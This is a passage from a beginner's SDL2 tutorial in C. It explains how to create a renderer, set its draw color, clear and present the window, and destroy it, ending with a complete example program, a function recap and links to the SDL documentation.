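    uint32_t budget_ms = 1000 / target_fps;
    return frame_ms >= budget_ms ? 0 : budget_ms - frame_ms;
}
```

<p class="indent">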
So when we put that in our code (after the window creation but before the window destruction), compile, and run it, we get this:</p> <p><img src="/img/SDL_Tutorial_1.png" alt="A window on my screen"></p> <p class="indent">I'm running i3wm, so it will probably look slightly different for you, but we've finally got a window! It still sucks, though. It doesn't do anything; it doesn't even clear itself! Let's make it white and learn a little bit about renderers in SDL.</p> <p class="indent">If we want to do stuff within a window, we have two options. One is to create an SDL_Surface from the window and draw to the surface, which is the sucky legacy way of doing it, so we're going to pretend that I didn't mention it. The other is to create an SDL_Renderer, which is what we're going to do, because it's so much more capable. We're going to use another SDL function call to create a renderer, and we'll capture it in an SDL_Renderer pointer:</p> <pre><code>SDL_Renderer *my_cool_renderer = SDL_CreateRenderer(my_cool_window, -1, SDL_RENDERER_ACCELERATED); if (!my_cool_renderer) { fprintf(stderr, "There was an error: %s\n", SDL_GetError()); return 1; } </code></pre> <p class="indent">Alright, so clearly the first argument is the window we want to create a renderer for. The second is more complicated. It's the index of the rendering driver to initialize, which you probably don't care too much about, so you can just put -1 in there to have it use the first one that's available. The last is a flag, which you know plenty about by now. Finally, as you can imagine, SDL_CreateRenderer returns NULL if a renderer cannot be created. This should all seem pretty familiar; it's the same pattern as creating a window: create a struct pointer to capture it, use a function call to create it, and do some basic error checking. Dead simple, and it just gets better from here.</p> <p>Once again, don't forget to clean up after yourself. The function to remove a renderer when you're done with it is SDL_DestroyRenderer.
It just takes an SDL_Renderer pointer as an argument.</p> <p>Now we've got a renderer, but if we compile and run our code, the effect is the same, because we haven't used it for anything. So let's change that and learn a little bit about drawing in SDL.</p> <p class="indent">Renderers in SDL have a color associated with them, which they use when drawing primitive geometry like lines and quadrilaterals. It doesn't affect textures, but you'll probably end up using primitive geometry at some point, so it's good to know. SDL_SetRenderDrawColor changes the aforementioned color. We're actually not going to be drawing any primitive geometry in this tutorial, but I'm bringing this up because the renderer also uses its associated color when clearing the screen. So, more about the function: it takes a renderer as an argument, followed by red, green, blue, and alpha (transparency) values. I'm going to make mine white (0xFF, 0xFF, 0xFF, 0xFF), but feel free to experiment. After that, we'll be calling SDL_RenderClear, which takes a renderer as an argument and, as I briefly mentioned a few lines ago, fills the window with whatever color the renderer is currently associated with. And finally, we'll call SDL_RenderPresent to update the screen. This is where some people get a little confused. Basically, in SDL you draw everything and <em>then</em> update the screen, meaning that you have as much time as you want to make the scene perfect before you have to show it to the user. And we're pretty much done!
Let's look at the basic program:</p> <pre><code>#include &lt;stdio.h&gt; #include &lt;SDL2/SDL.h&gt; int main(int argc, char *argv[]) { SDL_Window *my_cool_window; SDL_Renderer *my_cool_renderer; if (SDL_Init(SDL_INIT_VIDEO)) { fprintf(stderr, "ERROR: %s\n", SDL_GetError()); return 1; } my_cool_window = SDL_CreateWindow("Bush Did Harambe", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED, 400, 400, SDL_WINDOW_SHOWN); if (!my_cool_window) { fprintf(stderr, "ERROR: %s\n", SDL_GetError()); return 1; } my_cool_renderer = SDL_CreateRenderer(my_cool_window, -1, SDL_RENDERER_ACCELERATED); if (!my_cool_renderer) { fprintf(stderr, "ERROR: %s\n", SDL_GetError()); return 1; } SDL_SetRenderDrawColor(my_cool_renderer, 0xFF, 0xFF, 0xFF, 0xFF); SDL_RenderClear(my_cool_renderer); SDL_RenderPresent(my_cool_renderer); SDL_Delay(4000); SDL_DestroyRenderer(my_cool_renderer); SDL_DestroyWindow(my_cool_window); SDL_Quit(); return 0; } </code></pre> <p>Let's run it:</p> <p><img src="/img/SDL_Tutorial_2.png" alt="Finished window"></p> <p>To recap, we learned about:</p> <p><strong>SDL Functions</strong>:</p> <ul> <li><strong>SDL_Init</strong>: Used to initialize SDL. Takes a flag as a parameter. Returns 0 if it succeeds, or a negative value if it fails.</li> <li><strong>SDL_Quit</strong>: Complements SDL_Init. Takes no parameters and returns nothing.</li> <li><strong>SDL_CreateWindow</strong>: Creates a window and returns a pointer to it, or NULL if it fails. Takes a title, X and Y positions, width, height, and a flag as parameters.</li> <li><strong>SDL_DestroyWindow</strong>: Complements SDL_CreateWindow, takes a SDL_Window pointer as an argument and returns nothing.</li> <li><strong>SDL_CreateRenderer</strong>: Called to create a renderer, and returns a pointer to it, or NULL if it fails. 
Takes the SDL_Window pointer for the window you want to create a renderer for, an index (usually -1), and a flag as parameters.</li> <li><strong>SDL_DestroyRenderer</strong>: Complements SDL_CreateRenderer. Takes an SDL_Renderer pointer as an argument and returns nothing.</li> <li><strong>SDL_Delay</strong>: Takes a number of milliseconds as an argument, and proceeds to wait for that period of time.</li> <li><strong>SDL_SetRenderDrawColor</strong>: Takes a renderer, red, green, blue, and alpha values as arguments, and changes the color associated with the given renderer.</li> <li><strong>SDL_RenderClear</strong>: Takes a renderer as an argument and fills it with whatever color is currently associated with that renderer.</li> <li><strong>SDL_RenderPresent</strong>: "Refreshes" the renderer, presenting the image to the user.</li> </ul> <p><strong>Type Definitions</strong>:</p> <ul> <li><strong>SDL_Window</strong>: Captures the result of SDL_CreateWindow.</li> <li><strong>SDL_Renderer</strong>: Captures the result of SDL_CreateRenderer.</li> </ul> <p>And if you would like to read more, here are some additional resources:</p> <ul> <li><a href="https://wiki.libsdl.org/SDL_Init#Remarks">SDL Documentation - SDL_Init (Remarks)</a></li> <li><a href="https://wiki.libsdl.org/SDL_WindowFlags">SDL Documentation - Window Flags</a></li> <li><a href="https://wiki.libsdl.org/SDL_RendererFlags">SDL Documentation - Renderer Flags</a></li> </ul> <p>You're still reading? Well, this is my first tutorial ever. If you have any feedback, be it positive or negative, I'd love to hear it! I hope this tutorial was helpful; there are many more to come.</p>